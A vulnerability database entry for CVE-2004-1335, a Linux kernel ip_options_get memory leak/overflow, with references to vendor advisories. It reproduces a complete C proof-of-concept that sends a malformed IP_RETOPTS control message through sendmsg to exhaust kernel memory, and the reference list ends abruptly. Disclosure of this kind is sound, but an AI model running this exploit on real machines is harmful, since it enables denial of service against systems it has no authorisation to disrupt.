Linux Kernel Multiple Local Vulnerabilities

Vulnerability ID: 1108371
Vulnerability type: Unknown
Published: 2004-12-16
Updated: 2005-10-20
CVE ID: CVE-2004-1335
CNNVD-ID: CNNVD-200412-067
Platform: Linux
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/692
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-067
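|Vulnerability details
The ip_options_get function in Linux kernel versions before 2.6.10 has a memory leak vulnerability. A local user can cause a denial of service (memory consumption) through repeated calls to the ip_cmsg_send function.
|Exploit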
/* int overflow in ip_options_get
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases (like securityfocus and mitre)
 * */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
    struct msghdr msghdr;
    struct iovec iovector[10];
    int i,s;
    struct sockaddr_in sockad;
    char msg[128];
    struct cmsghdr *cmsg,*cm2;
    char opts[12];

    s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
    sockad.sin_family = AF_INET;
    sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
    sockad.sin_port=htons(8080);

    connect(s,(struct sockaddr *) &sockad, sizeof(sockad));

    memset(msg,'v',sizeof(msg));
    memset(opts,0,sizeof(opts));
#define VV 1024*1024
    cmsg = malloc(VV);
    memset(cmsg,0,VV);
    cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
    cmsg->cmsg_level = SOL_IP;
    cmsg->cmsg_type = IP_RETOPTS;
    memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
    cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
    cm2->cmsg_level = SOL_IP;
    cm2->cmsg_type = IP_RETOPTS;
    cm2->cmsg_len =  -1;

    msghdr.msg_name = &sockad;
    msghdr.msg_namelen = sizeof(sockad);

    msghdr.msg_control=cmsg;
    msghdr.msg_controllen= cmsg->cmsg_len + 420;
    msghdr.msg_iov = iovector;

    msghdr.msg_iovlen = 1;
    iovector[0].iov_base = msg;
    iovector[0].iov_len = sizeof(msg);
    system("sync");
    if ((i = sendmsg(s, &msghdr, 0)) < 0)
        perror("sendmsg");
    return 42;
}

// milw0rm.com [2004-12-16]
|References

Source: XF
Name: linux-ipoptionsget-memory-leak(18524)
Link: http://xforce.iss.net/xforce/xfdb/18524
Source: FULLDISC
Name: 20041215 fun with linux kernel
Link: http://www.securitytrap.com/mail/full-disclosure/2004/Dec/0323.html
Source: BID
Name: 11956
Link: http://www.securityfocus.com/bid/11956
Source: www.guninski.com
Link: http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html
Source: BUGTRAQ
Name: 20041215 [USN-47-1] Linux kernel vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110383108211524&w=2
Source: OVAL
Name: oval:org.mitre.oval:def:11085
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11085
Source: REDHAT
Name: RHSA-2005:017
Link: http://www.redhat.com/support/errata/RHSA-2005-017.html
Source: REDHAT
Name: RHSA-2005:016
Link: http://www.redhat.com/support/errata/RHSA-2005-016.html
Source: DEBIAN
Name: DSA-1082
Link: http://www.debian.org/security/2006/dsa-1082
Source: DEBIAN
Name: DSA-1070
Link: http://www.debian.org/security/2006/dsa-1070
Source: DEBIAN
Name: DSA-1069
Link: http://www.debian.org/security/2006/dsa-1069
Source: DEBIAN
Name: DSA-106
